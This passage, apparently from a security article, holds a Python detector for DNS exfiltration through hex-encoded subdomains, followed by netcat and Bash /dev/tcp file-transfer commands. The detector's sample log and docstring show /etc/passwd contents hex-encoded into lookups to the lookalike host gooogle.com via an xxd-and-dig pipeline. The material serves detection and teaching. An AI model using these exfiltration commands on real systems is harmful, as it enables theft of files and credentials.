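        parent = ".".join(labels[-2:])
        st = stats[parent]
        st["total"] += 1
        st["clients"].add(client)
        if len(labels) > 2 and HEX_LABEL.match(labels[0]):
            st["hex"] += 1
            st["labels"].add(labels[0].lower())
    report = {}
    for parent, st in stats.items():
        if st["hex"] < min_hex_queries or st["hex"] / st["total"] < min_hex_ratio:
            continue
        if len(st["labels"]) / st["hex"] < 0.9:
            continue  # repeated labels: looks like content hashes, not a stream
        report[parent] = {
            "hex_queries": st["hex"],
            "total_queries": st["total"],
            "clients": sorted(st["clients"]),
            "approx_bytes": sum(len(label) // 2 for label in st["labels"]),
        }
    return report


# --- constructed sample log ------------------------------------------------
SAMPLE_SECRET = (b"root:x:0:0:root:/root:/bin/bash\n"
                 b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
                 b"bin:x:2:2:bin:/bin:/usr/sbin/nologin\n")


def build_sample_queries():
    """Emulate 'xxd -p -c 31 file | ... dig $line.gooogle.com' from the
    article, followed by ordinary lookups that must not be flagged."""
    lines = []
    for t, i in enumerate(range(0, len(SAMPLE_SECRET), 31)):
        chunk = binascii.hexlify(SAMPLE_SECRET[i:i + 31]).decode()
        lines.append(f"10:00:{t:02d} 10.10.10.5 {chunk}.gooogle.com.")
    lines += [
        "10:00:10 10.10.10.5 www.example.com.",
        "10:00:11 10.10.10.5 mail.example.com.",
        "10:00:12 10.10.10.6 d41d8cd98f00b204e9800998ecf8427e.static.example.net.",
        "10:00:13 10.10.10.6 d41d8cd98f00b204e9800998ecf8427e.static.example.net.",
        "10:00:14 10.10.10.6 d41d8cd98f00b204e9800998ecf8427e.static.example.net.",
    ]
    return lines


if __name__ == "__main__":
    for parent, info in analyze(build_sample_queries()).items():
        print(parent, info)
```

The repeated-label check is what keeps content-addressed CDN hostnames out of the report; tune the thresholds against your own resolver baseline before alerting on them.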

File transfer with NetCat

Scenario: 1.txt is sent from host A (10.10.10.100) to host B (10.10.10.200).

Receiver:

nc -l -p 1337 > 1.txt

Sender:

cat 1.txt | nc -l -p 1337

or

nc 10.10.10.200 1337 < 1.txt

In constrained environments where the receiver has no nc, Bash's /dev/tcp can be used to receive the file:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

References